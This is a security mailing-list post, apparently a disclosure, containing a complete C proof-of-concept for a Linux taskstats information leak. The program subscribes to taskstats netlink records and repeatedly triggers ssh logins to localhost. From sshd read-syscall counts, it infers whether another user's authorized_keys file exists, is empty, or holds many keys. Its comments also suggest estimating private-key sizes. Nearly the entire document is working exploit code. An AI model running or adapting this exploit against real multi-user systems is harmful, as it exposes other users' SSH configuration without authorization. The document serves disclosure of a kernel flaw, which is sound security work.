taskstats authorized_keys presence infoleak PoC
From: Vasiliy Kulikov <segoon () openwall com>
Date: Tue, 21 Jun 2011 22:18:08 +0400
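/*
 * This program tries to learn whether ~user/.ssh/authorized_keys exists
 * and is nonempty for any user on local machine. It uses world-readable
 * taskstats' nature to get somewhat private io statistics information. If
 * implant taskstats or /proc/<sshd-pid>/io polling into ssh client, it would be
 * possible to learn precise authorized_keys' size (and estimate private
 * key's(s') size).
 *
 * The specific min_rsyscalls bounds are working on the testing machine with
 * Linux-3.0-rc2 x86_64 and OpenSSH_5.3p1 Debian-3ubuntu6 with
 * UsePrivilegeSeparation=no. Other systems need their own numbers.
 *
 * gcc ssh_stat_authorized_keys.c -o ssh_stat_authorized_keys
 *
 * Based on linux-2.6/Documentation/accounting/getdelays.c
 *
 * by Vasiliy Kulikov <segoon from openwall on com>, 2011/06/21
 *
 * Structure, for readers of this listing: the parent registers with the
 * taskstats genetlink family for the CPUs in `cpumask`, a forked child keeps
 * running "ssh <user>@localhost" so that sshd processes start and exit, and
 * the parent records the smallest and largest read_syscalls value reported
 * in taskstats records whose ac_comm is "sshd". The author's premise is that
 * this count reflects how much of authorized_keys sshd read, which is the
 * signal being measured and classified against the calibration bounds below.
 *
 * NOTE(review): whether an unprivileged user can still observe per-task
 * I/O counters this way depends on the kernel; the follow-up thread
 * ("CVE request: kernel: taskstats/procfs io infoleak") is where the
 * kernel-side discussion continues.
 */

#include <stdio.h>
#include <stdlib.h>
#include <errno.h>
#include <unistd.h>
#include <poll.h>
#include <string.h>
#include <fcntl.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <sys/socket.h>
#include <sys/wait.h>
#include <signal.h>
#include <linux/genetlink.h>
#include <linux/taskstats.h>
#include <linux/cgroupstats.h>

/*
 * Generic macros for dealing with netlink sockets. Might be duplicated
 * elsewhere. It is recommended that commercial grade applications use
 * libnl or libnetlink and use the interfaces provided by the library
 */
#define GENLMSG_DATA(glh)	((void *)((char *)NLMSG_DATA(glh) + GENL_HDRLEN))
#define GENLMSG_PAYLOAD(glh)	(NLMSG_PAYLOAD(glh, 0) - GENL_HDRLEN)
#define NLA_DATA(na)		((void *)((char *)(na) + NLA_HDRLEN))
#define NLA_PAYLOAD(len)	((len) - NLA_HDRLEN)

/* Print a message to stderr and exit with the given code. */
#define err(code, fmt, arg...)			\
	do {					\
		fprintf(stderr, fmt, ##arg);	\
		exit(code);			\
	} while (0)

/* Maximum size of response requested or message sent */
#define MAX_MSG_SIZE	1024
/* Maximum number of cpus expected to be specified in a cpumask */
#define MAX_CPUS	32

/* Number of "sshd" taskstats records collected before reporting. */
#define MAX_SAMPLES	10

/* Pause between ssh attempts in the child, in microseconds. */
#define PROBE_INTERVAL_US	100000

/*
 * Calibration bounds for min_rsyscalls (see the file header: these are
 * system-dependent and were measured on the author's machine).
 */
enum {
	RSYSCALLS_NO_FILE	= 197,	/* below this: authorized_keys does not exist */
	RSYSCALLS_EMPTY		= 203,	/* below this: authorized_keys is empty */
	RSYSCALLS_NONEMPTY	= 210,	/* below this: not empty; at/above: many keys */
};

struct msgtemplate {
	struct nlmsghdr n;
	struct genlmsghdr g;
	char buf[MAX_MSG_SIZE];
};

/* CPUs whose taskstats records we subscribe to; sized for MAX_CPUS entries. */
static char cpumask[100 + 6 * MAX_CPUS] = "0,1";

/* Print the options this program actually parses (only -u). */
static void usage(void)
{
	fprintf(stderr, "ssh_stat_authorized_keys [-u username]\n");
	fprintf(stderr, "  -u: account name to probe (default: root)\n");
}

/*
 * Create a raw netlink socket for PROTOCOL and bind it to a kernel-assigned
 * address.
 *
 * Returns the socket fd, or -1 with errno set by socket()/bind().
 */
static int create_nl_socket(int protocol)
{
	struct sockaddr_nl local = { .nl_family = AF_NETLINK };
	int fd = socket(AF_NETLINK, SOCK_RAW, protocol);

	if (fd < 0)
		return -1;
	if (bind(fd, (struct sockaddr *) &local, sizeof(local)) < 0) {
		int saved = errno;	/* close() may clobber errno */
		close(fd);
		errno = saved;
		return -1;
	}
	return fd;
}

/*
 * Build a generic netlink request carrying a single attribute and send it
 * on SD.
 *
 * nlmsg_type: family id (or GENL_ID_CTRL); nlmsg_pid: our port id;
 * genl_cmd / nla_type: command and attribute type; nla_data / nla_len:
 * attribute payload.
 *
 * Returns 0 on success, -1 on failure (errno from sendto(), or EINVAL when
 * the attribute does not fit in the message buffer).
 */
static int send_cmd(int sd, __u16 nlmsg_type, __u32 nlmsg_pid,
		    __u8 genl_cmd, __u16 nla_type,
		    const void *nla_data, int nla_len)
{
	struct msgtemplate msg;
	struct sockaddr_nl nladdr = { .nl_family = AF_NETLINK };
	struct nlattr *na;
	const char *buf;
	int buflen;

	/*
	 * The attribute (header + payload + the extra byte inherited from
	 * getdelays.c, aligned) must fit in msg.buf; otherwise memcpy() below
	 * would write past the struct.
	 */
	if (nla_len < 0 || nla_len > MAX_MSG_SIZE ||
	    (size_t) NLMSG_ALIGN(nla_len + 1 + NLA_HDRLEN) > sizeof(msg.buf)) {
		errno = EINVAL;
		return -1;
	}

	memset(&msg, 0, sizeof(msg));
	msg.n.nlmsg_len = NLMSG_LENGTH(GENL_HDRLEN);
	msg.n.nlmsg_type = nlmsg_type;
	msg.n.nlmsg_flags = NLM_F_REQUEST;
	msg.n.nlmsg_seq = 0;
	msg.n.nlmsg_pid = nlmsg_pid;
	msg.g.cmd = genl_cmd;
	msg.g.version = 0x1;

	na = (struct nlattr *) GENLMSG_DATA(&msg);
	na->nla_type = nla_type;
	na->nla_len = nla_len + 1 + NLA_HDRLEN;	/* "+ 1" as in getdelays.c */
	memcpy(NLA_DATA(na), nla_data, nla_len);
	msg.n.nlmsg_len += NLMSG_ALIGN(na->nla_len);

	buf = (const char *) &msg;
	buflen = msg.n.nlmsg_len;
	while (buflen > 0) {
		ssize_t r = sendto(sd, buf, buflen, 0,
				   (struct sockaddr *) &nladdr, sizeof(nladdr));

		if (r < 0) {
			if (errno == EAGAIN)
				continue;	/* retry, as the original did */
			return -1;
		}
		buf += r;
		buflen -= r;
	}
	return 0;
}

/*
 * Probe the controller in genetlink to find the family id
 * for the TASKSTATS family.
 *
 * Returns the family id, or 0 when the request or the reply failed or the
 * reply did not carry CTRL_ATTR_FAMILY_ID where expected.
 */
static int get_family_id(int sd)
{
	struct {
		struct nlmsghdr n;
		struct genlmsghdr g;
		char buf[256];
	} ans;
	char name[100];
	struct nlattr *na;
	size_t off;
	int rep_len;
	int id = 0;

	snprintf(name, sizeof(name), "%s", TASKSTATS_GENL_NAME);
	if (send_cmd(sd, GENL_ID_CTRL, getpid(), CTRL_CMD_GETFAMILY,
		     CTRL_ATTR_FAMILY_NAME, name, strlen(name) + 1) < 0)
		return 0;

	/* zero first and test rep_len before touching ans: the original read
	 * ans.n.nlmsg_type even when recv() had failed */
	memset(&ans, 0, sizeof(ans));
	rep_len = recv(sd, &ans, sizeof(ans), 0);
	if (rep_len < 0 || !NLMSG_OK((&ans.n), rep_len) ||
	    ans.n.nlmsg_type == NLMSG_ERROR)
		return 0;

	/* first attribute: echoed CTRL_ATTR_FAMILY_NAME; the family id follows */
	na = (struct nlattr *) GENLMSG_DATA(&ans);
	off = (char *) na - (char *) &ans;
	if (off + NLA_HDRLEN > (size_t) rep_len)
		return 0;
	off += NLA_ALIGN(na->nla_len);
	if (off + NLA_HDRLEN + sizeof(__u16) > (size_t) rep_len)
		return 0;
	na = (struct nlattr *) ((char *) &ans + off);
	if (na->nla_type == CTRL_ATTR_FAMILY_ID)
		id = *(__u16 *) NLA_DATA(na);
	return id;
}

/*
 * Run one "ssh -o PasswordAuthentication=no <username>@localhost" attempt
 * with its stdout/stderr discarded, and wait for it.
 *
 * ssh is started with an explicit argv instead of system(), so the username
 * from -u is passed as a single argument and never interpreted by a shell.
 * Failures to fork/exec are ignored: the caller just tries again.
 */
static void run_ssh_probe(const char *username)
{
	char target[sizeof("@localhost") + 128];
	pid_t pid;

	snprintf(target, sizeof(target), "%s@localhost", username);

	pid = fork();
	if (pid < 0)
		return;
	if (pid == 0) {
		int devnull = open("/dev/null", O_WRONLY);

		if (devnull >= 0) {
			dup2(devnull, STDOUT_FILENO);
			dup2(devnull, STDERR_FILENO);
			close(devnull);
		}
		execlp("ssh", "ssh", "-o", "PasswordAuthentication=no",
		       target, (char *) NULL);
		_exit(127);
	}
	waitpid(pid, NULL, 0);
}

/*
 * Entry point. Parses -u, subscribes to taskstats for `cpumask`, forks the
 * ssh-triggering child, collects MAX_SAMPLES "sshd" records, prints the
 * min/max read_syscalls and the classification, then deregisters.
 *
 * Returns EXIT_SUCCESS once a result was printed and the deregister
 * succeeded, EXIT_FAILURE otherwise (the original returned 0 on every path).
 */
int main(int argc, char *argv[])
{
	struct msgtemplate msg;
	struct nlattr *na;
	struct taskstats *tst;
	char username[128] = "root";
	unsigned long long min_rsyscalls = 100000, max_rsyscalls = 0;
	int samples = 0;
	int nl_sd = -1;
	pid_t cpid = -1;
	__u32 mypid;
	__u16 id;
	int c, rc, rep_len, len, aggr_len, len2;
	int ret = EXIT_FAILURE;

	while ((c = getopt(argc, argv, "u:")) != -1) {
		switch (c) {
		case 'u':
			/* bounded copy; the original strcpy() could overflow username[] */
			if (snprintf(username, sizeof(username), "%s", optarg)
			    >= (int) sizeof(username))
				err(1, "username too long (max %zu bytes)\n",
				    sizeof(username) - 1);
			break;
		default:
			usage();
			exit(EXIT_FAILURE);
		}
	}

	nl_sd = create_nl_socket(NETLINK_GENERIC);
	if (nl_sd < 0)
		err(1, "error creating Netlink socket\n");

	mypid = getpid();
	id = get_family_id(nl_sd);
	if (!id) {
		fprintf(stderr, "Error getting family id, errno %d\n", errno);
		goto out_close;
	}

	/* subscribe to taskstats records for the CPUs listed in cpumask */
	rc = send_cmd(nl_sd, id, mypid, TASKSTATS_CMD_GET,
		      TASKSTATS_CMD_ATTR_REGISTER_CPUMASK,
		      cpumask, strlen(cpumask) + 1);
	if (rc < 0) {
		fprintf(stderr, "error sending register cpumask\n");
		goto out_close;
	}

	cpid = fork();
	if (cpid < 0) {
		fprintf(stderr, "fork failed, errno %d\n", errno);
		goto out_dereg;
	}
	if (cpid == 0) {
		/* child: keep triggering sshd until the parent is gone */
		printf("[*] username: %s\n[*] wait", username);
		fflush(stdout);
		for (;;) {
			struct timeval tv = { .tv_sec = 0,
					      .tv_usec = PROBE_INTERVAL_US };

			run_ssh_probe(username);
			putchar('.');	/* progress marker, as "echo -n ." did */
			fflush(stdout);
			if (kill(mypid, 0))	/* parent exited: stop */
				exit(0);
			select(0, NULL, NULL, NULL, &tv);
		}
	}

	/* parent: read taskstats records until MAX_SAMPLES "sshd" ones were seen */
	for (;;) {
		rep_len = recv(nl_sd, &msg, sizeof(msg), 0);
		if (rep_len < 0) {
			fprintf(stderr, "nonfatal reply error: errno %d\n", errno);
			continue;
		}
		/* validate the header before reading any field from it */
		if (!NLMSG_OK((&msg.n), rep_len)) {
			fprintf(stderr, "fatal reply error: truncated message (%d bytes)\n",
				rep_len);
			goto done;
		}
		if (msg.n.nlmsg_type == NLMSG_ERROR) {
			struct nlmsgerr *nlerr = NLMSG_DATA(&msg);

			fprintf(stderr, "fatal reply error, errno %d\n", nlerr->error);
			goto done;
		}

		rep_len = GENLMSG_PAYLOAD(&msg.n);
		na = (struct nlattr *) GENLMSG_DATA(&msg);
		len = 0;
		while (len < rep_len) {
			if (rep_len - len < (int) NLA_HDRLEN)
				break;	/* trailing bytes too short for an attribute */
			len += NLA_ALIGN(na->nla_len);
			switch (na->nla_type) {
			case TASKSTATS_TYPE_AGGR_TGID:
				/* fallthrough */
			case TASKSTATS_TYPE_AGGR_PID:
				aggr_len = NLA_PAYLOAD(na->nla_len);
				len2 = 0;
				/* for nested attributes, na follows */
				na = (struct nlattr *) NLA_DATA(na);
				while (len2 < aggr_len) {
					if (na->nla_type == TASKSTATS_TYPE_STATS) {
						tst = (struct taskstats *) NLA_DATA(na);
						if (strcmp(tst->ac_comm, "sshd") == 0) {
							if (samples++ >= MAX_SAMPLES)
								goto done;
							if (max_rsyscalls < tst->read_syscalls)
								max_rsyscalls = tst->read_syscalls;
							if (min_rsyscalls > tst->read_syscalls)
								min_rsyscalls = tst->read_syscalls;
						}
					}
					/*
					 * advance by this attribute's own length; the
					 * original added the cumulative len2, which only
					 * worked because the nest held exactly two
					 * attributes
					 */
					len2 += NLA_ALIGN(na->nla_len);
					na = (struct nlattr *)
						((char *) na + NLA_ALIGN(na->nla_len));
				}
				break;
			case TASKSTATS_TYPE_NULL:
				/* fallthrough */
			default:
				break;
			}
			na = (struct nlattr *) ((char *) GENLMSG_DATA(&msg) + len);
		}
	}

done:
	if (cpid > 0) {
		kill(cpid, SIGKILL);
		waitpid(cpid, NULL, 0);	/* reap; the original left a zombie */
	}
	sleep(1);

	printf("\n[!] min/max read(): %llu/%llu\n[+] ", min_rsyscalls, max_rsyscalls);
	/*
	 * These numbers are system-dependent!
	 * Profile your system (e.g. on your own account) if you want it to work.
	 */
	if (min_rsyscalls < RSYSCALLS_NO_FILE)
		printf("~/%s/.ssh/authorized_keys doesn't exists.\n", username);
	else if (min_rsyscalls < RSYSCALLS_EMPTY)
		printf("~/%s/.ssh/authorized_keys is empty.\n", username);
	else if (min_rsyscalls < RSYSCALLS_NONEMPTY)
		printf("~/%s/.ssh/authorized_keys is not empty.\n", username);
	else
		printf("~/%s/.ssh/authorized_keys is full of keys!\n", username);
	ret = EXIT_SUCCESS;

out_dereg:
	rc = send_cmd(nl_sd, id, mypid, TASKSTATS_CMD_GET,
		      TASKSTATS_CMD_ATTR_DEREGISTER_CPUMASK,
		      cpumask, strlen(cpumask) + 1);
	if (rc < 0) {
		fprintf(stderr, "error sending deregister cpumask\n");
		ret = EXIT_FAILURE;
	}
out_close:
	close(nl_sd);
	return ret;
}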